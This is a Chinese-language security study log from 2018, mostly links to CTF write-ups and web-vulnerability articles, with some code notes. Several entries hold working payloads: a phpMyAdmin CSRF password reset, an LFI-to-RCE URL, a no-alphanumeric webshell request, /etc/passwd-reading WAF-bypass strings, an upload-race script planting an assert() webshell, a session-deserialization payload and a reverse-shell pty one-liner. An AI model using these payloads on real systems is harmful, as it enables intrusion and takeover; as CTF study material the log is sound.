# 日志 2018/09 ## 01 --- [Flask debug pin安全问题](https://xz.aliyun.com/t/2553) [Hackingweb.kr 做题记录 (1-12) ](http://shaobaobaoer.cn/archives/654/hackingweb-kr-81e998aee595) [网鼎杯题目源码](https://github.com/hongriSec/CTF-Training) [【2018年 网鼎杯CTF 第二场】红日安全-网鼎杯WriteUp(24日 更新:web详解)](https://xz.aliyun.com/t/2619#toc-2) [【2018年 网鼎杯CTF 第三场】Web 题解(28日更新:web最后一题)](https://xz.aliyun.com/t/2648#toc-5) [【2018年 网鼎杯CTF 第四场】部分题目WP](https://xz.aliyun.com/t/2667#toc-1) [phpjiami 数种解密方法](https://www.leavesongs.com/PENETRATION/unobfuscated-phpjiami.html#0x05-getshell) ## 03 --- [一步一步学ROP之linux_x64篇](https://segmentfault.com/a/1190000007406442) https://github.com/zhengmin1989/ROP_STEP_BY_STEP [ctf pwn中的缓解机制及其原理](http://eternalsakura13.com/2018/03/25/aslr/) [ROP学习:64位栈溢出](https://chybeta.github.io/2017/06/26/ROP%E5%AD%A6%E4%B9%A0%EF%BC%9A64%E4%BD%8D%E6%A0%88%E6%BA%A2%E5%87%BA/) [Webhacking.kr writeup(更新至challenge 29)](https://blog.csdn.net/qq_19876131/article/details/51148227#t8) [Hackingweb.kr 做题记录 (1-12)](http://shaobaobaoer.cn/archives/654/hackingweb-kr-81e998aee595) [PHP代码审计笔记--命令执行漏洞](https://www.cnblogs.com/xiaozi/p/7831529.html) ## 04 https://yeasy.gitbooks.io/docker_practice/image/dockerfile/copy.html [Docker-LAMP](https://github.com/mattrayner/docker-lamp) ## 09 [Tomcat自带log的配置详解](http://www.cnblogs.com/xiaochina/p/6864043.html) [【i春秋】 Web —— 爆破-1](https://ciphersaw.me/2018/08/27/%E3%80%90i%E6%98%A5%E7%A7%8B%E3%80%91%20Web%20%E2%80%94%E2%80%94%20%E7%88%86%E7%A0%B4-1/) globals全局变量 [【i春秋】 Web —— 爆破-2](https://ciphersaw.me/2018/08/31/%E3%80%90i%E6%98%A5%E7%A7%8B%E3%80%91%20Web%20%E2%80%94%E2%80%94%20%E7%88%86%E7%A0%B4-2/) var_dump ## 14 [Docker教程](http://dockone.io/article/101) ## 17 [Mysql Order By注入总结](https://www.cnblogs.com/icez/p/Mysql-Order-By-Injection-Summary.html) [Mysql Order by注入](http://vinc.top/2016/06/20/mysql-order-by-%E5%90%8E%E6%B3%A8%E5%85%A5/) ## 25 [通过一道审计题了解SSRF](https://www.liuxianglai.top/?p=133) [Gopher SSRF攻击内网应用复现](https://www.liuxianglai.top/?p=289) [Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写](https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html) ## 26 [几个隐写题目的总结](https://mp.weixin.qq.com/s/kxpmNpk8xAA3mbMtzyWaiw) 通道隐写 安装opencv库 ``` pip install opencv-python ``` ```python # -*- coding: utf-8 -*- import cv2 #opencv-python import numpy as np import os def lowbit(x): return x&0x1 png= cv2.imread("flag_enc.png" , cv2.IMREAD_UNCHANGED) #读取文件名 os.system("mkdir temp") os.system("cd temp") for i in range(0,4): for f in range(0,4): dst= cv2.bitwise_xor(lowbit(png[: ,: ,i]),lowbit(png[: ,:, f])) cv2.imwrite("temp/"+"xor_"+str(i)+"_"+str(f)+".png",dst*255) for i in range(0,4): for f in range(0,4): dst= cv2.bitwise_or(lowbit(png[: ,: ,i]),lowbit(png[: ,:, f])) cv2.imwrite("temp/"+"or_"+str(i)+"_"+str(f)+".png",dst*255) for i in range(0,4): for f in range(0,4): dst= cv2.bitwise_and(lowbit(png[: ,: ,i]),lowbit(png[: ,:, f])) cv2.imwrite("temp/"+"and_"+str(i)+"_"+str(f)+".png",dst*255) ``` 坐标转为二维码或者用gnuplot ```python import cv2 import os import numpy as np n=0 canvas= np.ones((300, 300, 3), dtype="uint8") canvas=canvas*255 list=open("123.txt").read().split("\n") list=[i.split(",")for i in list] for p in list: canvas[int(p[0]),int(p[1])]=[0,0,0] cv2.imwrite("2.jpg",canvas) cv2.imshow("Canvas",canvas) cv2.waitKey(0) ``` RGB转图片 ```python import cv2 import os import numpy as np canvas = np.zeros((111, 887, 3), dtype="uint8") list=open("ce.txt").read().split("\n") for y in range(0,887): for x in range(0,111): arr=list[x+(y)*111].split(",") canvas[x,y]=[arr[0],arr[1],arr[2]] cv2.imwrite("2.jpg", canvas) cv2.imshow("Canvas", canvas) cv2.waitKey(0) ``` [用 Anaconda 完美解决 Python2 和 python3 共存问题](https://foofish.net/compatible-py2-and-py3.html) ``` # 基于 python3.6 创建一个名为test_py3 的环境 conda create --name test_py3 python=3.6 # 基于 python2.7 创建一个名为test_py2 的环境 conda create --name test_py2 python=2.7 # 激活 test 环境 activate test_py2 # windows source activate test_py2 # linux/mac # 切换到python3 activate test_py3 ``` ## 28 [phpMyAdmin <= 4.7.7 CSRF分析](https://www.anquanke.com/post/id/158525) [phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9) Exploit](https://blog.vulnspy.com/2018/06/12/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-PMASA-2017-9-exploit/) 没有对GET参数进行验证 ```htmlmixed <p>POC TEST</p> <img src="http://localhost:8888/sql.php?db=mysql&table=user&sql_query=SET password = PASSWORD('vul_test')" style="display:none"/> ``` [phpmyadmin4.8.1后台getshell](https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247485036&idx=1&sn=8e9647906c5d94f72564dec5bc51a2ab&chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&mpshare=1&scene=1&srcid=0621gAv1FMtrgoahD01psMZr&pass_ticket=LqhRfckPxAVG2dF%2FjxV%2F9%2FcEb5pShRgewJe%2FttJn2gIlIyGF%2FbsgGmzcbsV%2BLmMK#rd) [phpMyAdmin 4.8.x 本地文件包含漏洞利用](https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/) [vulnspy在线实验链接](http://www.vulnspy.com/phpmyadmin-4.8.1/phpmyadmin_4.8.1_lfi_to_rce_vulnerability/) LFI to RCE ``` http://f2701c8665299168173e444f70106c9c.vsplate.me/?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_pnspojb49jucufmg6qrkcna6r5561lb4 ``` [CTF中几种通用的sql盲注手法和注入的一些tips](https://www.anquanke.com/post/id/160584) ## 29 [如何安全快速地部署多道 ctf pwn 比赛题目](https://mp.weixin.qq.com/s/UDgBYTeQqjpqK0D1CFThMA) github:https://github.com/giantbranch/pwn_deploy_chroot [墨者学院审计类通关指南](https://xz.aliyun.com/t/2821) # 日志 2018/10 ## 2 [命令执行和绕过的一些小技巧](https://www.anquanke.com/post/id/84920) https://chybeta.github.io/2017/08/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/ https://chybeta.github.io/2017/08/08/php%E4%BB%A3%E7%A0%81-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ [PHP代码审计笔记--命令执行漏洞](https://www.cnblogs.com/xiaozi/p/7831529.html) [浅谈CTF中命令执行与绕过的小技巧](http://pupiles.com/shellcode.html) https://www.jianshu.com/p/000a4ad1b933 [Flask入门](http://docs.jinkan.org/docs/flask/quickstart.html) ## 3 [LDAP注入漏洞(CVE-2017-14596)](http://www.freebuf.com/articles/web/149059.html) https://bbs.aliyun.com/simple/t536451.html LDAP盲注爆破出admin的密码 [Windows下的"你画我猜" -- 告别效率低下的目录扫描方法](https://www.from0to1.me/2018/05/11/36.html) ## 6 [无字母数字webshell之提高篇](https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html) :::info PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持。所以,我们可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。 ::: ``` (~%8F%97%8F%96%91%99%90)(); ``` ![](https://i.imgur.com/1NR02Hr.png) :::info 我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。 php生成临时文件名是随机的,最后一个字符不一定是大写字母,不过多尝试几次也就行了。 最后,我传入的code为?><?=`. /???/????????[@-[]`;?>,发送数据包如下: ::: ``` POST /?code=?%3E%3C?=`.%20/???/????????[@-[]`;?%3E HTTP/1.1 Host: 192.168.0.200:9091 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------281422247829490 Content-Length: 325 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------281422247829490 Content-Disposition: form-data; name="upload_file"; filename="1.txt" Content-Type: application/octet-stream #! /bin/sh id -----------------------------281422247829490 Content-Disposition: form-data; name="submit" submit -----------------------------281422247829490-- ``` ![](https://i.imgur.com/ZLo8Wld.png) [利用动态二进制加密实现新型一句话](http://wiki.ioin.in/post/group/OrPn) [利用动态二进制加密实现新型一句话木马之PHP篇](https://xz.aliyun.com/t/2774#toc-0) https://github.com/rebeyond/Behinder ## 8 [Linux中 /proc/[pid] 目录各文件简析](https://www.hi-linux.com/posts/64295.html#procpidcmdline) ## 9 [Server-Side Template Injection and Code Injection Detection and Exploitation Tool](https://github.com/epinna/tplmap) SSTI注入工具 [Collection of steganography tools - helps with CTF challenges](https://github.com/DominicBreuker/stego-toolkit) ## 10 [python安全和代码审计相关资料收集](https://github.com/bit4woo/python_sec) http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/#%E9%A2%98%E7%9B%AE%E4%BA%8C http://www.k0rz3n.com/2018/05/04/Python%20%E7%9A%84%20type%E4%B8%8Eclass%20%E4%B9%8B%E4%BA%89/ https://www.cnblogs.com/busui/p/7283137.html http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/ ## 12 python3 SSTI [Flask jinja2模板注入思路总结](http://www.freebuf.com/vuls/162752.html) 有python2,python3的遍历 https://hatboy.github.io/2018/04/19/Python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E6%80%BB%E7%BB%93/ [ubuntu_agnoster_install.md](https://gist.github.com/renshuki/3cf3de6e7f00fa7e744a) [updatexml injection without concat](https://xz.aliyun.com/t/2160) [mysql MAKE_SET()用法](https://blog.csdn.net/fangzy0112/article/details/27323603) ``` MAKE_SET(bits,str1,str2,...) 返回一个设定值 (一个包含被‘,’号分开的字字符串的字符串) , 由在bits 组中具有相应的比特的字符串组成。 str1 对应比特 0, str2 对应比特1,以此类推。str1, str2, ...中的 NULL值不会被添加到结果中。 mysql> SELECT MAKE_SET(1,'a','b','c'); -> 'a' mysql> SELECT MAKE_SET(1 | 4,'hello','nice','world'); -> 'hello,world' mysql> SELECT MAKE_SET(1 | 4,'hello','nice',NULL,'world'); -> 'hello' mysql> SELECT MAKE_SET(0,'a','b','c'); -> '' bits应将期转为二进制,如,1为,0001,倒过来排序,则为1000,将bits后面的字符串str1,str2等,放置 在这个倒过来的二进制排序中,取出值为1对应的字符串,则得到hello 1|4表示进行或运算,为0001 | 0100,得0101,倒过来排序,为1010, 则'hello','nice','world'得到的是hello word。 'hello','nice',NULL,'world'得到的是hello。null不取,只有1才取对应字符串 ``` ![](https://i.imgur.com/TB5ykFU.png) ## 13 [MYSQL报错注入的一点总结](https://xz.aliyun.com/t/253#toc-0) [【SQL注入】报错注入姿势总结](http://vinc.top/2017/03/23/%E3%80%90sql%E6%B3%A8%E5%85%A5%E3%80%91%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E5%A7%BF%E5%8A%BF%E6%80%BB%E7%BB%93/) ## 14 ```php <?php $db = mysqli_connect('localhost','web_brave','','web_brave'); $id = @$_GET['id']; $key = $db->real_escape_string(@$_GET['key']); if(preg_match('/\s|[\(\)\'"\/\\=&\|1-9]|#|\/\*|into|file|case|group|order|having|limit|and|or|not|null|union|select|from|where|--/i', $id)) die('Attack Detected. Try harder: '. $_SERVER['REMOTE_ADDR']); // attack detected $query = "SELECT `id`,`name`,`key` FROM `users` WHERE `id` = $id AND `key` = '".$key."'"; $q = $db->query($query); if($q->num_rows) { echo '<h3>Users:</h3><ul>'; while($row = $q->fetch_array()) { echo '<li>'.$row['name'].'</li>'; } echo '</ul>'; } else { die('<h3>Nop.</h3>'); } ``` https://andyw330.github.io/2017/10/02/DefCamp-CTF-Qualification-2017-Are-you-brave-enough-Web/ https://github.com/jmtiong/dctf17/tree/master/Are%20You%20Brave%20Enough%3F https://github.com/bennofs/docs/blob/master/defcamp-2017/brave.md https://ctftime.org/writeup/7717 构造全真条件,用%00使mysql忽略后面的语句 ``` `id`=`id`;%00 ``` [js原型链污染](https://laworigin.github.io/2018/09/11/js%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/) ## 15 flask 的current_app >flask原生提供current_app, application 一旦启动,就可以通过current_app.config 获取当前application的所有配置。 https://blog.csdn.net/m0_37323771/article/details/80645100 https://otakekumi.github.io/2018/09/03/2018TokeyWesterns-CTF-Python%E4%B8%A4%E5%88%99Writeup%E5%8F%8A%E6%8B%93%E5%B1%95/ https://www.jianshu.com/p/f3dba5b5c343 ![](https://i.imgur.com/fPbFrwc.png) ## 16 [一个CTF GAME引发的php内核分析](https://paper.seebug.org/566/) 在php7.0以前的版本中(int)’6e6’结果是6,但是在7.1以后的版本中,(int)’6e6’已经是6000000,符合(int)’6e6’ = (int)(float)’6e6’这个逻辑了。 最终的结果来看,php7.0及以前的版本使用strtoll转字符串到整型,7.1以后的版本使用了strtod来转换。 [PHP7内核剖析](https://github.com/pangudashu/php7-internal) [命令执行WAF绕过技巧总结](http://www.freebuf.com/articles/web/185158.html) 0×01 技巧一:通配符 >`*` 代表『 0 个到无穷多个』任意字符 ? 代表『一定有一个』任意字符 [ ] 同样代表『一定有一个在括号内』的字符(非任意字符)。例如 [abcd] 代表『一定有一个字符, 可能是 a, b, c, d 这四个任何一个』 [ - ] 若有减号在中括号内时,代表『在编码顺序内的所有字符』。例如 [0-9] 代表 0 到 9 之间的所有数字,因为数字的语系编码是连续的! [^ ] 若中括号内的第一个字符为指数符号 (^) ,那表示『反向选择』,例如 [^abc] 代表 一定有一个字符,只要是非 a, b, c 的其他字符就接受的意思。 ``` /?in/cat /?tc/p?sswd ``` 0×02 技巧二:连接符 ``` /'b'i'n'/'c'a't' /'e't'c'/'p'a's's'w'd 双引号 /"b"i"n"/"w"h"i"c"h" "n"c 反斜杆 /b\i\n/w\h\i\c\h n\c ``` 0×03 技巧三:未初始化的bash变量 ``` cat$a /etc$a/passwd$a ``` ```php <?php echo "OK"; system('dig '.$_GET['host']); ?> ``` [Solveme.peng.kr平台Web题解](http://www.freebuf.com/articles/web/165537.html) ## 23 [Phar与Stream Wrapper造成PHP RCE的深入挖掘](https://xz.aliyun.com/t/2958) ## 25 [关于反序列化攻击方法探究](https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652849018&idx=1&sn=e10055e81890a2ffe245edbbb748e3c8&chksm=bd593fb78a2eb6a1314a1fc78ca6fa24701d3ec054aa38b8da4c4fd44f879ac7feebbe00d955&mpshare=1&scene=23&srcid=1025bNnUjgAeHWIvrIetFby2#rd) python反序列化 ## 26 [无回显代码执行利用方法](http://www.admintony.com/%E6%97%A0%E5%9B%9E%E6%98%BE%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95.html) [渗透测试最佳实践](http://www.admintony.com/penetration_test_best_practice.html) ## 27 [利用Linux定时任务crontab反弹shell](https://c1h3ng.github.io/linux/2017/11/12/crontab-getshell/) [SCTF2018 0x02 新的建议板](https://www.cnblogs.com/Jas502n/p/9228589.html) [跟厂长学PHP7内核(二):源码分析的环境与工具](https://www.cnblogs.com/enochzzg/p/9547595.html) hackhttp https://github.com/BugScanTeam/hackhttp https://github.com/LandGrey/upload-labs-writeup ```python #!/usr/bin/env python # coding:utf-8 # Build By LandGrey import hackhttp from multiprocessing.dummy import Pool as ThreadPool def upload(lists): hh = hackhttp.hackhttp() raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/upload-labs/Pass-17/index.php Cookie: pass=17 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------6696274297634 Content-Length: 341 -----------------------------6696274297634 Content-Disposition: form-data; name="upload_file"; filename="17.php" Content-Type: application/octet-stream <?php assert($_POST["LandGrey"])?> -----------------------------6696274297634 Content-Disposition: form-data; name="submit" 上传 -----------------------------6696274297634-- """ code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw) print(str(code) + "\r") pool = ThreadPool(10) pool.map(upload, range(10000)) pool.close() pool.join() ``` [二十年以来对 RSA 密码系统攻击综述](https://paper.seebug.org/727/#3) [一键安装藏隐患,phpStudy 批量入侵的分析与溯源](https://paper.seebug.org/725/) ## 28 [php接收+号等特殊字符参数的问题](https://blog.csdn.net/ljl890705/article/details/79916546) php在接收到参数的时候,会自动对参数进行一次urldecode解码操作,因此,如果传送的参数未进行url编码,那特殊字符(例如+号)就会被解码为空格,导致参数接收不正确 [渗透测试之信息收集ZoomEye篇](https://blog.csdn.net/qq1124794084/article/details/78676483) [如何自己构建一个小型的Zoomeye----从技术细节探讨到实现](https://blog.csdn.net/u011721501/article/details/41967847) [GraphQL安全指北](https://www.anquanke.com/post/id/156930#h2-1) ## 29 docker-compose 资料 https://legacy.gitbook.com/book/yeasy/docker_practice/ https://blog.csdn.net/pushiqiang/article/details/78682323 ``` version: '2' services: php: image: php:7.2-apache volumes: - ./www:/var/www/html ports: - "8080:80" ``` ## 30 [从底层分析eval和assert的区别](https://www.cnblogs.com/iamstudy/articles/analysis_eval_and_assert.html) [先知XSS挑战赛题解 - Exploiting the "unexploitable"](https://www.cnblogs.com/iamstudy/articles/Xss_Challenge_Unexploitable_Wp.html) ## 31 [docker与docker-compose进入容器内命令区分](https://www.codeinfo.top/archives/264) ``` docker-compose exec container_name bash ``` 在使用这两个命令时,container_name是容器的name,不是id,不过使用docker-compose.yml模板文件,发现container_name是模板中service中的服务名 [Docker Compose多容器部署(五)](https://blog.csdn.net/wxb880114/article/details/82904765) [使用Docker-Compose,如何执行多个命令](https://codeday.me/bug/20170617/27292.html) ``` command: bash -c "python manage.py migrate && python manage.py runserver 0.0.0.0:8000" ``` [reboot 后 Docker服务及容器自动启动设置](https://blog.csdn.net/wxb880114/article/details/82904765) 在运行docker容器时可以加如下参数来保证每次docker服务重启后容器也自动重启: ``` docker run --restart=always ``` 如果已经启动了则可以使用如下命令: ``` docker update --restart=always <CONTAINER ID> ``` 反弹shell使用python获得终端 ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` Now.sh 部署服务 https://zeit.co/now http://object.ws/2017/09/10/nowsh-note/ https://www.ouyangsong.com/posts/43735/ Reverse Shell as a Service https://github.com/omg2hei/ReShellAAS https://github.com/lukechilds/reverse-shell # 日志 2018-11 ## 2 PHP中SESSION反序列化机制 https://blog.spoock.com/2016/10/15/php-serialize-problem/ 在php有一个这样有意思的设置–>php默认的SESSION会话机制 存储在文件系统的会话数据的内容是已经序列化后的内容,程序执行session_start()后PHP会自动读取文件并unserialize反序列化成数组赋值给超全局变量$_SESSION https://myndtt.github.io/2017/12/19/php%E7%9A%84session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/ PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患 https://gist.github.com/chtg/f74965bfea764d9c9698 关于PHP SESSION反序列化 http://wyb0.com/posts/php-session-unserialize/ ``` POST / HTTP/1.1 Host: web.jarvisoj.com:32784 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.9 Cookie: UM_distinctid=164a0d24dbabaf-0161c8bd49c079-47e1039-149c48-164a0d24dbb76; PHPSESSID=chgu13cmbtudsb5dsrbi2eu5s7 Content-Type: multipart/form-data; boundary=---------------------------180241424816257 Content-Length: 403 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------180241424816257 Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS" 666 -----------------------------180241424816257 Content-Disposition: form-data; name="file1"; filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir('/opt/lampp/htdocs'));\";}" Content-Type: application/octet-stream 123 -----------------------------180241424816257-- ``` [dangerous-phpinfo](https://altmanz.cn/2018/10/08/dangerous-phpinfo/) 0ctf-Ezdoor https://altmanz.cn/2018/10/10/0ctf-Ezdoor/ jarvisoj-web-writeup https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/ http://skysec.top/2017/08/16/jarvisoj-web/ http://shaobaobaoer.cn/archives/595/jarvis-oj-write-up-web83e586 ## 3 php parse_url https://github.com/jiangsir404/Audit-Learning/blob/master/parse_url%20%E5%87%BD%E6%95%B0trick.md http://skysec.top/2017/12/15/parse-url%E5%87%BD%E6%95%B0%E5%B0%8F%E8%AE%B0/ https://hacksec.xyz/2018/03/23/php-trick/ 经典漏洞形式--上传后删除 ```php <?php $filename = __DIR__ . '/tmp/' . $user['name']; $data = $user['info']; file_put_contents($filename, $data); // ...一些处理 if (file_exists($filename)) { unlink($filename); } ?> ``` https://github.com/jiangsir404/Audit-Learning/blob/master/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%9C%88/%E7%BB%8F%E5%85%B8%E6%BC%8F%E6%B4%9E%E5%BD%A2%E5%BC%8F%EF%BC%8D%EF%BC%8D%E4%B8%8A%E4%BC%A0%E5%90%8E%E5%88%A0%E9%99%A4.md http://wonderkun.cc/index.html/?p=626 PHP的libcurl中存在的一些问题 http://wonderkun.cc/index.html/?p=670 SQL专栏 http://hwhxy.space/2018/09/29/SQL%E4%B8%93%E6%A0%8F.html XSS专栏 http://hwhxy.space/2018/10/08/XSS%E4%B8%93%E6%A0%8F.html Web日志安全分析浅谈 https://xz.aliyun.com/t/1121/ Typecho 前台 getshell 漏洞分析 https://paper.seebug.org/424/ https://p0sec.net/index.php/archives/114/ https://www.jianshu.com/p/a98cad54c81a 采集代理ip 爬取+验证+保存本地+去重复。一条龙服务 https://github.com/Lz1y/proxyips 顶级黑客大会HITB的7个小秘密 https://zhuanlan.zhihu.com/p/48264358 https://conference.hitb.org/hitbsecconf2018pek/materials/ 四个实例递进php反序列化漏洞理解 https://www.anquanke.com/post/id/159206#h2-6 Mooder是一款开源、安全、简洁、强大的团队内部知识分享平台。 https://phith0n.github.io/mooder/ https://phith0n.github.io/mooder/setting/info/ php-fpm环境的一种后门实现 https://www.anquanke.com/post/id/163197#h2-5 SQL注入的两个小Trick与总结 https://www.anquanke.com/post/id/158674#h2-0 between and 操作符代替比较符 order by盲注 结合union来盲注 基于时间的盲注 基于时间的盲注 基于rand()的盲注 ## 5 MySQL时间盲注五种延时方法 (PWNHUB 非预期解) https://www.cdxy.me/?p=789 pyc https://ctf-wiki.github.io/ctf-wiki/misc/other/pyc/ http://www.iteye.com/topic/382423 https://kdr2.com/tech/python/pyc-format.html https://docs.python.org/release/2.7/library/dis.html#python-bytecode-instructions http://python.jobbole.com/84599/ https://0x48.pw/2017/03/20/0x2f/ https://github.com/rocky/python-uncompyle6 https://github.com/zrax/pycdc 强网杯FlappyPig举办经验总结 第二届强网杯中应用的一种反作弊新思路 https://bbs.ichunqiu.com/thread-36705-1-1.html https://github.com/fpbibi/nextrsa 第二届强网杯线下赛新技术分享 https://www.anquanke.com/post/id/105387#h2-0 some useful ctf crypto functions: https://github.com/fpbibi/bcrypto 网站真实IP发现手段浅谈 https://www.anquanke.com/post/id/163348 nmap可视化界面 https://github.com/Rev3rseSecurity/WebMap parse_url和libcurl发生的那些事 http://wonderkun.cc/index.html/?p=670 http://skysec.top/2018/03/15/Some%20trick%20in%20ssrf%20and%20unserialize()/#trick2-libcurl-and-parse-url http://php.net/manual/zh/function.curl-setopt.php :::info **parse_url与libcurl对与url的解析差异可能导致ssrf** 当url中有多个@符号时, parse_url中获取的host是最后一个@符号后面的host, 而libcurl则是获取的第一个@符号之后的。 因此当代码对http://user@eval.com:80@baidu.com 进行解析时,PHP获取的host是baidu.com是允许访问的域名,而最后调用libcurl进行请求时则是请求的eval.com域名,可以造成ssrf绕过 **url标准的灵活性导致绕过filter_var与parse_url进行ssrf** filter_var()函数对于http://evil.com;google.com 会返回false也就是认为url格式错误,但是对于0://evil.com:80;google.com:80/ 、0://evil.com:80,google.com:80/、0://evil.com:80\google.com:80/却返回true。 ::: sql注入绕过 http://byd.dropsec.xyz/2016/08/01/SQL-Injection%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/ ## 7 SQL注入导图 https://times0ng.github.io/2018/06/04/SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E5%9B%BE/ ## 8 第二届强网杯 http://www.cnblogs.com/iamstudy/articles/2th_qiangwangbei_ctf_writeup.html https://xz.aliyun.com/t/2219 NodeJS的Buffer泄露数据 https://zhuanlan.zhihu.com/p/25894270 ## 9 remote_addr 不可伪造 https://imququ.com/post/x-forwarded-for-header-in-http.html https://www.nginx.com/blog/ip-transparency-direct-server-return-nginx-plus-transparent-proxy/ ![](https://i.imgur.com/r2by4VN.png) 网页在提交表单的时候,如果有空格,则会被转化为+字符。服务器处理数据的时候,会把+号处理成空格。 url的三个js编码函数escape(),encodeURI(),encodeURIComponent()简介 https://www.haorooms.com/post/js_escape_encodeURIComponent ## 10 浅析SSRF原理及利用方式 https://www.anquanke.com/post/id/145519 SSRF漏洞(原理&绕过姿势) https://zhuanlan.zhihu.com/p/27898202 从XML到RCE(远程代码执行) https://www.anquanke.com/post/id/151944 VirtualBox E1000 0day 虚拟机逃逸漏洞(全文已更新) https://www.anquanke.com/post/id/163714 pwnhub time injection带来的新思路 https://www.anquanke.com/post/id/104319#h2-4 ## 11 Node.js 反序列化远程代码执行分析 https://www.anquanke.com/post/id/157920 ## 12 《一起学 Node.js》 https://github.com/nswbmw/N-blog 小黑盒集赞刷赞(手机刷还可以,分享点赞链接已经升级到v2版本) https://www.bilibili.com/video/av30555574/ ~~https://www.bilibili.com/video/av30564097/ https://shimo.im/docs/Fm39xLATMJE9nVUE/~~ awesome-sec-talks - 从 2012 年到 2018 年各安全大会的视频资源列表: https://github.com/PaulSec/awesome-sec-talks/ 构造优质上传漏洞fuzz字典 http://gv7.me/articles/2018/make-upload-vul-fuzz-dic/ https://github.com/c0ny1/upload-fuzz-dic-builder [比赛] Google的CTF源码及解答 https://github.com/google/google-ctf/tree/master/2018/finals ## 13 SQL注入fuzz字典 https://github.com/H4lo/dictionary/blob/master/sql_fuzz.txt 深入理解正则表达式-----应用于检测csrf的正则表达式 https://www.cnblogs.com/lcamry/p/6732775.html xss可用事件 https://www.cnblogs.com/lcamry/p/5807544.html mysql天书 https://github.com/lcamry/sqli-labs RPO攻击技术浅析 https://mp.weixin.qq.com/s?__biz=MzUxOTYzMzU0NQ==&mid=2247483692&idx=1&sn=ecd853bb5cb3e654a08c5214a1b951a2&chksm=f9f7eecace8067dc155346e5204f6eae0df9890af60777234e249021d577226c6989e73a107b&scene=21#wechat_redirect https://github.com/eboda/34c3ctf/tree/master/urlstorage CaptfEncoder 各种加密解密工具 https://github.com/guyoung/CaptfEncoder SQLMAP 人工辅助注入简介 http://www.melodia.pw/?p=918 ## 14 HCTF 2018 源码和官方writeup https://github.com/vidar-team/HCTF2018 https://bysec.io/hctf/writeup.html#Web OWASP Juice Shop 实战报告与解析 http://shaobaobaoer.cn/archives/510/owasp-juice-shop#0x10 https://www.smartercollege.cn 之前使用的服务:https://caddyserver.com/ 现在使用了腾讯CDN:NWSs 从HTTP响应头看各家CDN缓存技术 https://segmentfault.com/a/1190000006673084 ## 15 Unicode安全 http://blog.lnyas.xyz/?p=1411 unicode同形字引起的安全问题 http://xdxd.love/2016/10/17/unicode%E5%90%8C%E5%BD%A2%E5%AD%97%E5%BC%95%E8%B5%B7%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/#%E7%BC%96%E7%A0%81%E7%9A%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E3%80%81unicode%E7%BC%96%E7%A0%81%E5%92%8C%E5%90%8C%E5%BD%A2%E5%AD%97 Punycode安全威胁浅析 https://xz.aliyun.com/t/2737 LCTF-2017-官方Writeup https://blog.pwnhub.cn/2017/11/22/LCTF-2017-%E5%AE%98%E6%96%B9Writeup/#%E7%AD%BE%E5%88%B0%E9%A2%98 软连接任意文件读取参考:一个有趣的任意文件读取 https://xz.aliyun.com/t/2589 